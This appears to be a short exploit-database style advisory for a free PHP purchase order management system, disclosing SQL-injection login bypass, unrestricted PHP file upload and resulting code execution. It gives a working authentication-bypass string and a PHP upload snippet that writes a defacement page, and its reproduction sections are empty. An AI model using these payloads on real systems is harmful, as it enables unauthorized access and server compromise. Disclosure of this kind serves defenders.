## Titles: POMS-PHP-(by oretnom23 )-v1.0-FU-SQLi-RCE-HAT.TRICK
1. SQLi Bypass Authentication
2. File Upload
3. RCE
## Latest update from the vendor: 5 hours 32 minutes ago
## Author: nu11secur1ty
## Date: 05/07/2024
## Vendor: https://github.com/oretnom23
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://portswigger.net/web-security/sql-injection, https://portswigger.net/web-security/file-upload, https://portswigger.net/web-security/authentication
## Description:
The username parameter is not sanitizing well, the attacker can bypass authentication and login to the system.
Using this vulnerability, the attacker can upload any PHP file on the server.
The parameter id="cimg" is not sanitizing securely.
STATUS: CRITICAL- Vulnerability
The attacker can upload a malicious file with hazardous content. Then he can use it to create another file on the server.
STATUS: CRITICAL- Vulnerability
- SQLi bypass authentication:
nu11secur1ty' or 1=1#
- FU:
- SQLi - Bypass-Authentication:
// by nu11secur1ty - 2023
$fh = fopen('test.html', 'a');
fwrite($fh, '<h1>Hello, you are hacked by Fileupload and RCE!</h1>');
## Reproduce:
## Proof and Exploit:
## Time spent:
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html
https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>